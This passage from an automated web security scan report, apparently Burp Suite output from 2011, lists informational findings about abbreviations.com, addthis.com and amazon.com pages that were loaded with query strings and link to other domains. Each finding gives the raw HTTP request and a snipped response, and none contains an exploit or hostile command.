...[SNIP]...
</div><a class=gb2 href=http://www.youtube.com/?hl=en&tab=v1 onclick=gbar.qs(this)>YouTube</a>
...[SNIP]...
<div class=div-footer>
<a href=http://googlevideo.blogspot.com/>Blog</a>
...[SNIP]...

20.540. http://www.abbreviations.com/bs2.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.abbreviations.com
Path:	/bs2.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://www.abbreviations.com/bs2.aspx?st=

The response contains the following links to other domains:

http://addthis.com/bookmark.php?v=250&username=dejango
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/250/addthis_widget.js
http://twitter.com/justadded
http://uac.advertising.com/wrapper/aceUAC.js
http://www.convert.net/
http://www.definitions.net/
http://www.facebook.com/pages/STANDS4/135790749786167
http://www.google-analytics.com/urchin.js
http://www.lyrics.net/
http://www.phrases.net/
http://www.quotes.net/
http://www.references.net/
http://www.rhymes.net/
http://www.synonyms.net/
http://www.uszip.com/

Request

GET /bs2.aspx?st= HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:13:29 GMT
Connection: close
Content-Length: 25727

<title>What does  stand for?</title>

<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-positio
...[SNIP]...
<link rel="stylesheet" type="text/css" href="abbr.css" />
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
<td><a href="http://www.convert.net"><img border="0" src="http://www.abbreviations.com/images/con-off.jpg" alt="Convert.net" onmouseover="this.src='http://www.abbreviations.com/images/con-on.jpg'" onmouseout="this.src='http://www.abbrevia
...[SNIP]...
<td><a href="http://www.definitions.net"><img border="0" src="http://www.abbreviations.com/images/def-off.jpg" alt="Definitions.net" onmouseover="this.src='http://www.abbreviations.com/images/def-on.jpg'" onmouseout="this.src='http://www.abbr
...[SNIP]...
<td><a href="http://www.lyrics.net"><img border="0" src="http://www.abbreviations.com/images/lyr-off.jpg" alt="Lyrics.net" onmouseover="this.src='http://www.abbreviations.com/images/lyr-on.jpg'" onmouseout="this.src='http://www.abbreviat
...[SNIP]...
<td><a href="http://www.phrases.net"><img border="0" src="http://www.abbreviations.com/images/phr-off.jpg" alt="Phrases.net" onmouseover="this.src='http://www.abbreviations.com/images/phr-on.jpg'" onmouseout="this.src='http://www.abbrevia
...[SNIP]...
<td><a href="http://www.quotes.net"><img border="0" src="http://www.abbreviations.com/images/quo-off.jpg" alt="Quotes.net" onmouseover="this.src='http://www.abbreviations.com/images/quo-on.jpg'" onmouseout="this.src='http://www.abbreviat
...[SNIP]...
<td><a href="http://www.references.net"><img border="0" alt="References.net" src="http://www.abbreviations.com/images/ref-off.jpg" onmouseover="this.src='http://www.abbreviations.com/images/ref-on.jpg'" onmouseout="this.src='http://www.abbr
...[SNIP]...
<td><a href="http://www.rhymes.net"><img border="0" alt="Rhymes.net" src="http://www.abbreviations.com/images/rhy-off.jpg" onmouseover="this.src='http://www.abbreviations.com/images/rhy-on.jpg'" onmouseout="this.src='http://www.abbreviat
...[SNIP]...
<td><a href="http://www.synonyms.net"><img border="0" src="http://www.abbreviations.com/images/syn-off.jpg" alt="Synonyms.net" onmouseover="this.src='http://www.abbreviations.com/images/syn-on.jpg'" onmouseout="this.src='http://www.abbrevi
...[SNIP]...
<td><a href="http://www.uszip.com"><img border="0" alt="USZip.com" src="http://www.abbreviations.com/images/zip-off.jpg" onmouseover="this.src='http://www.abbreviations.com/images/zip-on.jpg'" onmouseout="this.src='http://www.abbreviati
...[SNIP]...
<td width="100%" align="center"> <a class="addthis_button" href="http://addthis.com/bookmark.php?v=250&username=dejango"><img src="http://www.abbreviations.com/images/b.png" alt="Bookmark and Share" style="border:0;vertical-align:-3px;"></a><script " src="http://s7.addthis.com/js/250/addthis_widget.js#username=dejango"></script>
...[SNIP]...
</script>
           <script type="text/javascript"
            src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
           </script>
...[SNIP]...
</script>
           <script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
...[SNIP]...
<span style="vertical-align:-3px;"><a href="http://www.facebook.com/pages/STANDS4/135790749786167"><img alt="Follow us on Facebook!" src="http://www.abbreviations.com/images/f.gif">
...[SNIP]...
<span style="vertical-align:-3px;"><a href="http://twitter.com/justadded"><img alt="Follow us on Twitter!" src="http://www.abbreviations.com/images/t.gif">
...[SNIP]...

20.541. http://www.abbreviations.com/searchAmazon.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.abbreviations.com
Path:	/searchAmazon.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://www.abbreviations.com/searchAmazon.aspx?st=

The response contains the following links to other domains:

http://addthis.com/bookmark.php?v=250&username=dejango
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/250/addthis_widget.js
http://twitter.com/justadded
http://uac.advertising.com/wrapper/aceUAC.js
http://www.convert.net/
http://www.definitions.net/
http://www.facebook.com/pages/STANDS4/135790749786167
http://www.google-analytics.com/urchin.js
http://www.lyrics.net/
http://www.phrases.net/
http://www.quotes.net/
http://www.references.net/
http://www.rhymes.net/
http://www.synonyms.net/
http://www.uszip.com/

Request

GET /searchAmazon.aspx?st= HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:20:21 GMT
Connection: close
Content-Length: 26561

<html>

<head>
<title>Amazon Search Results</title>
<style><!--
.ctgp {padding:0px 10px 0px 0px;}
.ctgp a, .ctgp a:visited {color:#000000;}
.ctgp a:hover {color:#990000;}

.resp {padding:0px;
...[SNIP]...
<link rel="stylesheet" type="text/css" href="abbr.css" />
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
<td><a href="http://www.convert.net"><img border="0" src="http://www.abbreviations.com/images/con-off.jpg" alt="Convert.net" onmouseover="this.src='http://www.abbreviations.com/images/con-on.jpg'" onmouseout="this.src='http://www.abbrevia
...[SNIP]...
<td><a href="http://www.definitions.net"><img border="0" src="http://www.abbreviations.com/images/def-off.jpg" alt="Definitions.net" onmouseover="this.src='http://www.abbreviations.com/images/def-on.jpg'" onmouseout="this.src='http://www.abbr
...[SNIP]...
<td><a href="http://www.lyrics.net"><img border="0" src="http://www.abbreviations.com/images/lyr-off.jpg" alt="Lyrics.net" onmouseover="this.src='http://www.abbreviations.com/images/lyr-on.jpg'" onmouseout="this.src='http://www.abbreviat
...[SNIP]...
<td><a href="http://www.phrases.net"><img border="0" src="http://www.abbreviations.com/images/phr-off.jpg" alt="Phrases.net" onmouseover="this.src='http://www.abbreviations.com/images/phr-on.jpg'" onmouseout="this.src='http://www.abbrevia
...[SNIP]...
<td><a href="http://www.quotes.net"><img border="0" src="http://www.abbreviations.com/images/quo-off.jpg" alt="Quotes.net" onmouseover="this.src='http://www.abbreviations.com/images/quo-on.jpg'" onmouseout="this.src='http://www.abbreviat
...[SNIP]...
<td><a href="http://www.references.net"><img border="0" alt="References.net" src="http://www.abbreviations.com/images/ref-off.jpg" onmouseover="this.src='http://www.abbreviations.com/images/ref-on.jpg'" onmouseout="this.src='http://www.abbr
...[SNIP]...
<td><a href="http://www.rhymes.net"><img border="0" alt="Rhymes.net" src="http://www.abbreviations.com/images/rhy-off.jpg" onmouseover="this.src='http://www.abbreviations.com/images/rhy-on.jpg'" onmouseout="this.src='http://www.abbreviat
...[SNIP]...
<td><a href="http://www.synonyms.net"><img border="0" src="http://www.abbreviations.com/images/syn-off.jpg" alt="Synonyms.net" onmouseover="this.src='http://www.abbreviations.com/images/syn-on.jpg'" onmouseout="this.src='http://www.abbrevi
...[SNIP]...
<td><a href="http://www.uszip.com"><img border="0" alt="USZip.com" src="http://www.abbreviations.com/images/zip-off.jpg" onmouseover="this.src='http://www.abbreviations.com/images/zip-on.jpg'" onmouseout="this.src='http://www.abbreviati
...[SNIP]...
<td width="100%" align="center"> <a class="addthis_button" href="http://addthis.com/bookmark.php?v=250&username=dejango"><img src="http://www.abbreviations.com/images/b.png" alt="Bookmark and Share" style="border:0;vertical-align:-3px;"></a><script " src="http://s7.addthis.com/js/250/addthis_widget.js#username=dejango"></script>
...[SNIP]...
</script>
           <script type="text/javascript"
            src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
           </script>
...[SNIP]...
</script>
           <script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
...[SNIP]...
<span style="vertical-align:-3px;"><a href="http://www.facebook.com/pages/STANDS4/135790749786167"><img alt="Follow us on Facebook!" src="http://www.abbreviations.com/images/f.gif">
...[SNIP]...
<span style="vertical-align:-3px;"><a href="http://twitter.com/justadded"><img alt="Follow us on Twitter!" src="http://www.abbreviations.com/images/t.gif">
...[SNIP]...

20.542. http://www.addthis.com/bookmark.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/bookmark.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.addthis.com/bookmark.php?wt=nw&pub=sistergoldenhair&url=

The response contains the following links to other domains:

http://cache.addthiscdn.com/www/q0197/js/bookmark.js
http://cache.addthiscdn.com/www/q0197/style/bookmark.css

Request

GET /bookmark.php?wt=nw&pub=sistergoldenhair&url= HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 14:03:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 92428

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...
<link rel="canonical" href="http://www.addthis.com/bookmark.php" />
<link href="//cache.addthiscdn.com/www/q0197/style/bookmark.css" rel="stylesheet" type="text/css" />
<style type="text/css" media="only screen and (device-width: 768px)" />
...[SNIP]...
</style>
<script type="text/javascript" src="//cache.addthiscdn.com/www/q0197/js/bookmark.js"></script>
...[SNIP]...

20.543. http://www.addthis.com/feed.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/feed.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.addthis.com/feed.php?pub=kicko&h1=http%3A%2F%2Fwww.x64bitdownload.com%2Frss%2Fdownloads.xml&t1=

The response contains the following links to other domains:

http://cache.addthiscdn.com/www/q0197/images/addthis-logo.gif
http://cache.addthiscdn.com/www/q0197/style/old-styles.css
http://www.x64bitdownload.com/rss/downloads.xml

Request

GET /feed.php?pub=kicko&h1=http%3A%2F%2Fwww.x64bitdownload.com%2Frss%2Fdownloads.xml&t1= HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:03:20 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: pub=kicko; expires=Sat, 23-Jul-2011 16:03:20 GMT; path=/
Vary: Accept-Encoding
Content-Length: 7846
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...
</title>
<link href="//cache.addthiscdn.com/www/q0197/style/old-styles.css" rel="stylesheet" type="text/css" />

<script type="text/javascript">
...[SNIP]...
<td><img src="//cache.addthiscdn.com/www/q0197/images/addthis-logo.gif" width="260" height="32" /></td>
...[SNIP]...
put name="h1" type="hidden" value="http://www.x64bitdownload.com/rss/downloads.xml" checked="checked" /> 64 bit download - freeware, shareware - X 64-bit Download
X 64-bit Download logo
<a href="http://www.x64bitdownload.com/rss/downloads.xml" target="_blank">[view xml]</a>
...[SNIP]...

20.544. http://www.amazon.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.amazon.com
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://www.amazon.com/?&tag=parenthoodcom-20&camp=211493&creative=379969&linkCode=op1&adid=0GZGV3PX406SYA9DGF7Q&

The response contains the following links to other domains:

http://d2lo25i6d3q8zm.cloudfront.net/browser-plugins/AmazonSearchSuggestionsOSD.MSIE.xml
http://ecx.images-amazon.com/images/I/417XQ0XwQuL._SL135_.jpg
http://ecx.images-amazon.com/images/I/41cnkm6rkhL._SL135_.jpg
http://ecx.images-amazon.com/images/I/51KP1RAWnrL._SL135_.jpg
http://g-ecx.images-amazon.com/images/G/01/amazon-credit/consumer/visa_gateway_300_4._V192208236_.gif
http://g-ecx.images-amazon.com/images/G/01/camera/gw/camera-3dcams_300x75._V172108031_.jpg
http://g-ecx.images-amazon.com/images/G/01/electronics/detail-page/asus-2._V189604747_.gif
http://g-ecx.images-amazon.com/images/G/01/electronics/detail-page/asus._V189604750_.gif
http://g-ecx.images-amazon.com/images/G/01/electronics/detail-page/dell._V189604740_.gif
http://g-ecx.images-amazon.com/images/G/01/gateway/visit_amazon_ca_tcg._V229026943_.gif
http://g-ecx.images-amazon.com/images/G/01/gno/images/general/navAmazonLogoFooter._V192570482_.gif
http://g-ecx.images-amazon.com/images/G/01/gno/images/orangeBlue/navPackedSprites-US-16._V212310439_.png
http://g-ecx.images-amazon.com/images/G/01/img10/software/300-column/turbo_tax_2010_300x120._V196727518_.jpg
http://g-ecx.images-amazon.com/images/G/01/kindle/merch/gw/shasta/shasta-gw-bestselling-475x275._V172146981_.jpg
http://g-ecx.images-amazon.com/images/G/01/watches/B000EQR6H0._V192598437_.jpg
http://g-ecx.images-amazon.com/images/G/01/watches/B0019FP47E._V192598089_.jpg
http://g-ecx.images-amazon.com/images/G/01/watches/B001A62M04._V192212155_.jpg
http://g-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V42752373_.gif
http://www.amazon.ca/
http://www.amazon.cn/
http://www.amazon.de/
http://www.amazon.fr/
http://www.amazon.it/
http://www.audible.com/
http://www.dpreview.com/
http://www.endless.com/
http://www.fabric.com/
http://www.imdb.com/
http://www.shopbop.com/welcome
http://www.smallparts.com/
http://www.warehousedeals.com/
http://www.woot.com/
http://www.zappos.com/
http://z-ecx.images-amazon.com/images/G/01/browser-scripts/us-site-wide-1.2.6/site-wide-10089555225.js._V173906659_.js
http://z-ecx.images-amazon.com/images/G/01/browser-scripts/us-site-wide-1.2.6/site-wide-5791285623.css._V173906657_.css
http://z-ecx.images-amazon.com/images/G/01/nav2/gamma/websiteGridCSS/websiteGridCSS-websiteGridCSS-8253._V186639940_.css
http://z-ecx.images-amazon.com/images/G/01/s9-campaigns/s9-widget-seeded._V172999743_.css
http://z-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif

Request

GET /?&tag=parenthoodcom-20&camp=211493&creative=379969&linkCode=op1&adid=0GZGV3PX406SYA9DGF7Q& HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 14:04:22 GMT
Server: Server
Set-Cookie: skin=noskin; path=/; domain=.amazon.com; expires=Tue, 25-Jan-2011 14:04:22 GMT
x-amz-id-1: 0CE2668WXXDSQR5PR7PV
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: s6OPjR2rj38YhI1zC2U1O/3MBqGcZuTSin8FL9WLITyJjhgwIud/Qst9vXPfPjMk
Vary: Accept-Encoding,User-Agent
nnCoection: close
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=184-5651957-6603505; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Content-Length: 133382

<html>
<head>

<style type="text/css">
...[SNIP]...
<div id="navSaGwBody" class="navSaNonJs">
<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" height="1" width="173" class="navSaGwForceWidth" alt=""/>
<script type="text/javascript">
...[SNIP]...
</map><img src="http://g-ecx.images-amazon.com/images/G/01/camera/gw/camera-3dcams_300x75._V172108031_.jpg" width="300" align="center" usemap="#CE-0800_3D_GW" alt="3D Cameras and Camcorders" height="75" border="0" /></td>
...[SNIP]...
Dlpo%255Fixgwamuscaen-21&token=AD297DDA0F9D6C887976CD08894B02DB57139A39&pf_rd_m=ATVPDKIKX0DER&pf_rd_s=center-intl-crossover-0&pf_rd_r=0CE2668WXXDSQR5PR7PV&pf_rd_t=101&pf_rd_p=499834531&pf_rd_i=507846"><img src="http://g-ecx.images-amazon.com/images/G/01/gateway/visit_amazon_ca_tcg._V229026943_.gif" align="center" alt="Shop at Amazon.ca" border="0" /></a>
...[SNIP]...
</map><img src="http://g-ecx.images-amazon.com/images/G/01/kindle/merch/gw/shasta/shasta-gw-bestselling-475x275._V172146981_.jpg" width="475" align="center" usemap="#kindleC2" alt="Kindle, the #1 Bestselling Product on Amazon" height="275" border="0" /></td>
...[SNIP]...
<div class="amabot_center" id="centercol">

<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" style="display:block" alt="" width="1" id="ATFMarker" onload="if (typeof uet == 'function') { uet('af'); } var gwatfcol = document.getElementById('center1'); if (gwatfcol == null) { gwatfcol = document.getElementById('centercol'); } if (gwatfcol != null) { var gwatfcolimg = gwatfcol.getElementsByTagName('img'); if (gwatfcolimg != null) { registerCSMEvent('cf', gwatfcolimg); } } for (var i=0;i<gwEH._f.length;i++) { try { gwEH._f[i](); } catch (e) {} } gwEH.afterFold = function(callback) { callback(); }"/>

<script type="text/javascript">
...[SNIP]...
</script>

<script type="text/javascript" src="http://z-ecx.images-amazon.com/images/G/01/browser-scripts/us-site-wide-1.2.6/site-wide-10089555225.js._V173906659_.js"></script>
...[SNIP]...
</script>

<link rel="stylesheet" type="text/css" href="http://z-ecx.images-amazon.com/images/G/01/s9-campaigns/s9-widget-seeded._V172999743_.css"/><div class="unified_widget rcm widget small_heading">
...[SNIP]...
<div class="imageContainer"><img src="http://ecx.images-amazon.com/images/I/417XQ0XwQuL._SL135_.jpg" alt="" width="135" height="135" id="ns_0CE2668WXXDSQR5PR7PV_5525_r0Image0" /></div>
...[SNIP]...
<div class="imageContainer"><img src="http://ecx.images-amazon.com/images/I/51KP1RAWnrL._SL135_.jpg" alt="" width="87" height="135" id="ns_0CE2668WXXDSQR5PR7PV_5525_r0Image1" /></div>
...[SNIP]...
<div class="imageContainer"><img src="http://ecx.images-amazon.com/images/I/41cnkm6rkhL._SL135_.jpg" alt="" width="113" height="135" id="ns_0CE2668WXXDSQR5PR7PV_5525_r0Image2" /></div>
...[SNIP]...
<div class="imageContainer"><img src="http://z-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" url="http://ecx.images-amazon.com/images/I/51pOdwD35SL._SL135_.jpg" alt="" width="135" height="135" id="ns_0CE2668WXXDSQR5PR7PV_5525_r0Image3" /></div>
...[SNIP]...
=B004IRUFR4&DownloadLocation=SEARCH" onclick="return ns_0CE2668WXXDSQR5PR7PV_5525__S9MusicPlayer.trackPreviewPressed('B004IRUFR4');" style="width: 135px; position: absolute; top: 108px; left: 0;">
<img id="ns_0CE2668WXXDSQR5PR7PV_5525_trackPreviewB004IRUFR4" class="s9_trackPreviewButton" align="absmiddle" width="22" height="22" border="0" title="Sample" alt="Sample" src="http://g-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V42752373_.gif"/>
<span id="ns_0CE2668WXXDSQR5PR7PV_5525_trackLabelB004IRUFR4" class="tiny s9_trackPreviewLabel" style="width: 109px; _padding-top: 9px">
...[SNIP]...
<div class="imageContainer"><img src="http://z-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" url="http://ecx.images-amazon.com/images/I/417XQ0XwQuL._SL135_.jpg" alt="" width="135" height="135" id="ns_0CE2668WXXDSQR5PR7PV_5525_r0Image4" /></div>
...[SNIP]...
<div class="imageContainer"><img src="http://z-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" url="http://ecx.images-amazon.com/images/I/51dC8RRX2UL._SL135_.jpg" alt="" width="133" height="135" id="ns_0CE2668WXXDSQR5PR7PV_5525_r0Image5" /></div>
...[SNIP]...
<div class="imageContainer"><img src="http://z-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" url="http://ecx.images-amazon.com/images/I/51jLKJgexYL._SL135_.jpg" alt="" width="88" height="135" id="ns_0CE2668WXXDSQR5PR7PV_5525_r0Image6" /></div>
...[SNIP]...
Eco-Drive-Chronograph-Canvas/dp/B000EQR6H0/ref=amb_link_19995401_1/184-5651957-6603505?pf_rd_m=ATVPDKIKX0DER&pf_rd_s=center-3&pf_rd_r=0CE2668WXXDSQR5PR7PV&pf_rd_t=101&pf_rd_p=488790311&pf_rd_i=507846"><img src="http://g-ecx.images-amazon.com/images/G/01/watches/B000EQR6H0._V192598437_.jpg" width="110" alt="Citizen Men's Eco-Drive Chronograph Canvas Watch #AT0200-05E" height="110" border="0" /></a>
...[SNIP]...
0-BA0850-Formula-Chronograph/dp/B0019FP47E/ref=amb_link_19995401_6/184-5651957-6603505?pf_rd_m=ATVPDKIKX0DER&pf_rd_s=center-3&pf_rd_r=0CE2668WXXDSQR5PR7PV&pf_rd_t=101&pf_rd_p=488790311&pf_rd_i=507846"><img src="http://g-ecx.images-amazon.com/images/G/01/watches/B0019FP47E._V192598089_.jpg" width="110" alt="TAG Heuer Men's Formula 1 Chronograph Watch #CAH1110.BA0850" height="110" border="0" /></a>
...[SNIP]...
-G-Shock-Riseman-Alti-Therm/dp/B001A62M04/ref=amb_link_19995401_11/184-5651957-6603505?pf_rd_m=ATVPDKIKX0DER&pf_rd_s=center-3&pf_rd_r=0CE2668WXXDSQR5PR7PV&pf_rd_t=101&pf_rd_p=488790311&pf_rd_i=507846"><img src="http://g-ecx.images-amazon.com/images/G/01/watches/B001A62M04._V192212155_.jpg" width="110" alt="Casio Men's G-Shock Riseman Alti-Therm Solar Atomic Watch #GW9200-1" height="110" border="0" /></a>
...[SNIP]...
08951_2/184-5651957-6603505?ie=UTF8&node=565108&field-keywords=acer&emi=ATVPDKIKX0DER&pf_rd_m=ATVPDKIKX0DER&pf_rd_s=center-4&pf_rd_r=0CE2668WXXDSQR5PR7PV&pf_rd_t=101&pf_rd_p=1269770282&pf_rd_i=507846"><img src="http://g-ecx.images-amazon.com/images/G/01/electronics/detail-page/asus-2._V189604747_.gif" width="120" alt="Acer" height="120" border="0" /></a>
...[SNIP]...
08951_4/184-5651957-6603505?ie=UTF8&node=565108&field-keywords=dell&emi=ATVPDKIKX0DER&pf_rd_m=ATVPDKIKX0DER&pf_rd_s=center-4&pf_rd_r=0CE2668WXXDSQR5PR7PV&pf_rd_t=101&pf_rd_p=1269770282&pf_rd_i=507846"><img src="http://g-ecx.images-amazon.com/images/G/01/electronics/detail-page/dell._V189604740_.gif" width="120" alt="Dell" height="120" border="0" /></a>
...[SNIP]...
_link_85008951_6/184-5651957-6603505?ie=UTF8&node=565108&brand=ASUS&emi=ATVPDKIKX0DER&pf_rd_m=ATVPDKIKX0DER&pf_rd_s=center-4&pf_rd_r=0CE2668WXXDSQR5PR7PV&pf_rd_t=101&pf_rd_p=1269770282&pf_rd_i=507846"><img src="http://g-ecx.images-amazon.com/images/G/01/electronics/detail-page/asus._V189604750_.gif" width="120" alt="ASUS" height="120" border="0" /></a>
...[SNIP]...
</map><img src="http://g-ecx.images-amazon.com/images/G/01/img10/software/300-column/turbo_tax_2010_300x120._V196727518_.jpg" width="300" align="center" usemap="#TT_2010" alt="TurboTax 2010" height="120" border="0" /></td>
...[SNIP]...
</map><img src="http://g-ecx.images-amazon.com/images/G/01/amazon-credit/consumer/visa_gateway_300_4._V192208236_.gif" width="300" align="center" usemap="#amazon-visa-roto" alt="Amazon.com Rewards Visa Card" height="120" border="0" /></td>
...[SNIP]...
<a href="/ref=footer_logo/184-5651957-6603505"><img src="http://g-ecx.images-amazon.com/images/G/01/gno/images/general/navAmazonLogoFooter._V192570482_.gif" width="126" alt="amazon.com" height="24" border="0" /></a>
...[SNIP]...
<div class="navFooterLine navFooterLinkLine navFooterPadItemLine">
<a href="http://www.amazon.ca">Canada</a>
<a href="http://www.amazon.cn">China</a>
<a href="http://www.amazon.fr">France</a>
<a href="http://www.amazon.de">Germany</a>
<a href="http://www.amazon.it">Italy</a>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.audible.com">Audible<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.dpreview.com">DPReview<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.endless.com">Endless<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.fabric.com">Fabric<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.imdb.com">IMDb<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.shopbop.com/welcome">Shopbop<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.smallparts.com">Small Parts<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.warehousedeals.com">Warehouse Deals<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.woot.com">Woot<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.zappos.com">Zappos<br/>
...[SNIP]...

20.545. http://www.amazon.com/b/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.amazon.com
Path:	/b/

Issue detail

The page was loaded from a URL containing a query string:

http://www.amazon.com/b/?ie=UTF8&node=507846&tag=amazusnavi-20&ref=pd_sl_24x92mgoc0_b/x22

The response contains the following links to other domains:

http://d2lo25i6d3q8zm.cloudfront.net/browser-plugins/AmazonSearchSuggestionsOSD.MSIE.xml
http://ecx.images-amazon.com/images/I/41-qiAEzE4L._SL135_.jpg
http://ecx.images-amazon.com/images/I/41LxZAhgkcL._SL135_.jpg
http://ecx.images-amazon.com/images/I/41eDq+YYvyL._SL135_.jpg
http://ecx.images-amazon.com/images/I/41eVCRbPx7L._SL135_.jpg
http://ecx.images-amazon.com/images/I/41mObreJEQL._SL135_.jpg
http://ecx.images-amazon.com/images/I/51PDazJ4nCL._SL135_.jpg
http://g-ecx.images-amazon.com/images/G/01/amazon-credit/consumer/visa_gateway_300_4._V192208236_.gif
http://g-ecx.images-amazon.com/images/G/01/camera/gw/camera-3dcams_300x75._V172108031_.jpg
http://g-ecx.images-amazon.com/images/G/01/electronics/detail-page/asus-2._V189604747_.gif
http://g-ecx.images-amazon.com/images/G/01/electronics/detail-page/asus._V189604750_.gif
http://g-ecx.images-amazon.com/images/G/01/electronics/detail-page/dell._V189604740_.gif
http://g-ecx.images-amazon.com/images/G/01/gateway/visit_amazon_ca_tcg._V229026943_.gif
http://g-ecx.images-amazon.com/images/G/01/gno/images/general/navAmazonLogoFooter._V192570482_.gif
http://g-ecx.images-amazon.com/images/G/01/gno/images/orangeBlue/navPackedSprites-US-16._V212310439_.png
http://g-ecx.images-amazon.com/images/G/01/img10/software/300-column/turbo_tax_2010_300x120._V196727518_.jpg
http://g-ecx.images-amazon.com/images/G/01/kindle/merch/gw/shasta/shasta-gw-bestselling-475x275._V172146981_.jpg
http://g-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V42752373_.gif
http://www.amazon.ca/
http://www.amazon.cn/
http://www.amazon.de/
http://www.amazon.fr/
http://www.amazon.it/
http://www.audible.com/
